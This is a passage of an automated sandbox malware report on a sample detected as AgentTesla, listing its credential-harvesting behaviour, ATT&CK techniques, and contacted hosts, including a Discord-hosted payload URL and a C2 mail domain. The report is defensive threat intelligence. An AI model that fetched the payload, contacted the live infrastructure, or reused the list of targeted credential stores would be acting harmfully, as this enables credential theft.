                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeQueries volume information: C:\Users\user\Desktop\450230549.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4136, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4136, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4136, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Native API                    		Boot or Logon Initialization Scripts311
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		34
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		531
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets261
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		13
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                    Masquerading                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job261
                    Virtualization/Sandbox Evasion                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt311
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1519251 Sample: 450230549.exe Startdate: 26/09/2024 Architecture: WINDOWS Score: 100 22 zqamcx.com 2->22 24 mail.zqamcx.com 2->24 26 3 other IPs or domains 2->26 34 Found malware configuration 2->34 36 Malicious sample detected (through community Yara rule) 2->36 38 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->38 40 11 other signatures 2->40 7 450230549.exe 15 3 2->7         started        signatures3 process4 dnsIp5 28 cdn.discordapp.com 162.159.134.233, 443, 49731 CLOUDFLARENETUS United States 7->28 20 C:\Users\user\AppData\...\450230549.exe.log, Unknown 7->20 dropped 42 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 7->42 44 Writes to foreign memory regions 7->44 46 Allocates memory in foreign processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 RegAsm.exe 14 2 7->12         started        16 RegAsm.exe 7->16         started        18 RegAsm.exe 7->18         started        file6 signatures7 process8 dnsIp9 30 zqamcx.com 78.110.166.82, 49733, 587 UKSERVERS-ASUKDedicatedServersHostingandCo-Location United Kingdom 12->30 32 ip-api.com 208.95.112.1, 49732, 80 TUT-ASUS United States 12->32 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->50 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 Tries to harvest and steal ftp login credentials 12->54 62 2 other signatures 12->62 56 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 16->56 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 16->58 60 Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent) 16->60 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    450230549.exe34%ReversingLabsWin32.Trojan.Sonbokli
                    450230549.exe100%Joe Sandbox ML

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://account.dyn.com/0%URL Reputationsafe
                    http://x1.c.lencr.org/00%URL Reputationsafe
                    http://x1.i.lencr.org/00%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
                    http://r11.o.lencr.org0#0%Avira URL Cloudsafe
                    http://mail.zqamcx.com0%Avira URL Cloudsafe
                    https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f0%Avira URL Cloudsafe
                    https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d&0%Avira URL Cloudsafe
                    http://cdn.discordapp.com0%Avira URL Cloudsafe
                    http://ip-api.com0%Avira URL Cloudsafe
                    http://r11.i.lencr.org/0#0%Avira URL Cloudsafe
                    http://zqamcx.com0%Avira URL Cloudsafe
                    https://cdn.discordapp.com0%Avira URL Cloudsafe
                    http://cdn.discordapp.comd0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    zqamcx.com
                    		78.110.166.82
                    		truetrue
                      		unknown
                      cdn.discordapp.com
                      		162.159.134.233
                      		truefalse
                        		unknown
                        ip-api.com
                        		208.95.112.1
                        		truetrue
                          		unknown
                          198.187.3.20.in-addr.arpa
                          		unknown
                          		unknownfalse
                            		unknown
                            mail.zqamcx.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f6535f&is=66f501df&hm=79c31af27b70e67c8e5bccaa49762a5ee024314b22617ea8ae2de8893a0fe97d&false
                              • Avira URL Cloud: safe
                              		unknown
                              http://ip-api.com/line/?fields=hostingfalse
                              • URL Reputation: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://mail.zqamcx.comRegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://account.dyn.com/450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://r11.o.lencr.org0#RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://x1.c.lencr.org/0RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://x1.i.lencr.org/0RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://cdn.discordapp.com450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ip-api.comRegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.discordapp.com/attachments/1288648799220400244/1288752046828425256/kingggggme.txt?ex=66f450230549.exefalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://zqamcx.comRegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://cdn.discordapp.com450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name450230549.exe, 00000000.00000002.1725521175.0000000002767000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028A1000.00000004.00000800.00020000.00000000.sdmpfalse
                              • URL Reputation: safe
                              		unknown
                              http://r11.i.lencr.org/0#RegAsm.exe, 00000003.00000002.3558791115.0000000002908000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558363687.0000000000D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://cdn.discordapp.comd450230549.exe, 00000000.00000002.1725521175.0000000002783000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              208.95.112.1
                              		ip-api.comUnited States
                              		53334TUT-ASUStrue
                              78.110.166.82
                              		zqamcx.comUnited Kingdom
                              		42831UKSERVERS-ASUKDedicatedServersHostingandCo-Locationtrue
                              162.159.134.233
                              		cdn.discordapp.comUnited States
                              		13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1519251
                              Start date and time:2024-09-26 09:17:58 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 6m 24s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Run name:Run with higher sleep bypass
                              Number of analysed new started processes analysed:8
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:450230549.exe
                              Detection:MAL
                              Classification:mal100.spre.troj.spyw.evad.winEXE@7/1@4/3
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 100%
                              • Number of executed functions: 88
                              • Number of non-executed functions: 7
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: 450230549.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              208.95.112.1SecuriteInfo.com.Win32.Malware-gen.27656.20815.exeGet hashmaliciousBlackshades, QuasarBrowse
                              • ip-api.com/json/
                              nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              CCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              QUOTE_467654.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              PO Invoice XJ210821Q.PDF.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              PO Invoice XJ210821Q.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              comprobante_HSBC_765543465768798086756458665345768.exeGet hashmaliciousAgentTeslaBrowse
                              • ip-api.com/line/?fields=hosting
                              Company profile.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                              • ip-api.com/line/?fields=hosting
                              78.110.166.82COB756883.vbsGet hashmaliciousCobaltStrikeBrowse
                              • windowsupdatesolutions.com/ServerCOB.txt
                              Ingreso_SII_Abril_2021.cmdGet hashmaliciousUnknownBrowse
                              • www.emolcl.com/namaste/puma.php
                              Ingreso_SII_Abril_2021.cmdGet hashmaliciousUnknownBrowse
                              • www.emolcl.com/namaste/puma.php

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              cdn.discordapp.comCSBls4grBI.exeGet hashmaliciousLummaC, Socks5SystemzBrowse
                              • 162.159.130.233
                              https://mj.ostep.net/acknowledgementsGet hashmaliciousUnknownBrowse
                              • 162.159.133.233
                              Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                              • 162.159.135.233
                              CERENAK-7373.exeGet hashmaliciousUnknownBrowse
                              • 162.159.135.233
                              CERENAK-7373.exeGet hashmaliciousUnknownBrowse
                              • 162.159.135.233
                              22.09.2024-22.09.2024.exeGet hashmaliciousAgentTeslaBrowse
                              • 162.159.133.233
                              receipt#295.vbsGet hashmaliciousUnknownBrowse
                              • 162.159.129.233
                              COT-14303168077.pdf.jsGet hashmaliciousUnknownBrowse
                              • 162.159.135.233
                              https://mjj.aigc369.com/Get hashmaliciousUnknownBrowse
                              • 162.159.130.233
                              ip-api.comSecuriteInfo.com.Win32.Malware-gen.27656.20815.exeGet hashmaliciousBlackshades, QuasarBrowse
                              • 208.95.112.1
                              nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              CCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              QUOTE_467654.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              http://getcloudapp.comGet hashmaliciousUnknownBrowse
                              • 208.95.112.2
                              PO Invoice XJ210821Q.PDF.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              PO Invoice XJ210821Q.PDF.scr.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              comprobante_HSBC_765543465768798086756458665345768.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              zqamcx.comeFatura_ETN2024000000575_Ekleri.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              SecuriteInfo.com.Win32.MalwareX-gen.16545.12050.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              DOC25082024.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              Halkbank_Ekstre_20240826_081429_424889.bat.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              SecuriteInfo.com.Win32.MalwareX-gen.1615.29113.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              • 78.110.166.82

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              UKSERVERS-ASUKDedicatedServersHostingandCo-LocationCCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              https://qrplanet.com/smdv5p/Get hashmaliciousUnknownBrowse
                              • 5.101.173.45
                              22.09.2024-22.09.2024.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              FaturaHat#U0131rlatma.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              Payment_Release-Now cnesst.gouv.qc.ca.htmlGet hashmaliciousUnknownBrowse
                              • 5.101.173.45
                              Payment Advice.pdf.jsGet hashmaliciousRemcosBrowse
                              • 178.159.12.230
                              eFatura_ETN2024000000575_Ekleri.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              AMERICAN GROUP.jsGet hashmaliciousRemcosBrowse
                              • 178.159.12.230
                              SecuriteInfo.com.Win32.MalwareX-gen.16545.12050.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              #U00d6deme Talebi_27.08.2024.exeGet hashmaliciousAgentTeslaBrowse
                              • 78.110.166.82
                              TUT-ASUSSecuriteInfo.com.Win32.Malware-gen.27656.20815.exeGet hashmaliciousBlackshades, QuasarBrowse
                              • 208.95.112.1
                              nDHL_AWB_6078538091_scr.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              0umBa15TaN.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              0umBa15TaN.exeGet hashmaliciousUnknownBrowse
                              • 208.95.112.1
                              CCE_000110.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              QUOTE_467654.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              http://getcloudapp.comGet hashmaliciousUnknownBrowse
                              • 208.95.112.2
                              PO Invoice XJ210821Q.PDF.exeGet hashmaliciousAgentTeslaBrowse
                              • 208.95.112.1
                              CLOUDFLARENETUS64.exeGet hashmaliciousUnknownBrowse
                              • 162.159.61.3
                              PO-100001499.exeGet hashmaliciousFormBookBrowse
                              • 188.114.96.3
                              ADNOC requesting RFQ.exeGet hashmaliciousFormBookBrowse
                              • 104.21.64.108
                              TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exeGet hashmaliciousMassLogger RAT, Snake Keylogger, VIP KeyloggerBrowse
                              • 188.114.96.3
                              https://qwehikd-asdu.xyz/Get hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              https://geminishdw-dws.top/Get hashmaliciousUnknownBrowse
                              • 188.114.97.3
                              https://geminiqwc-sw.top/Get hashmaliciousUnknownBrowse
                              • 188.114.96.3
                              https://qwekorqw-eqo.top/Get hashmaliciousUnknownBrowse
                              • 188.114.96.3
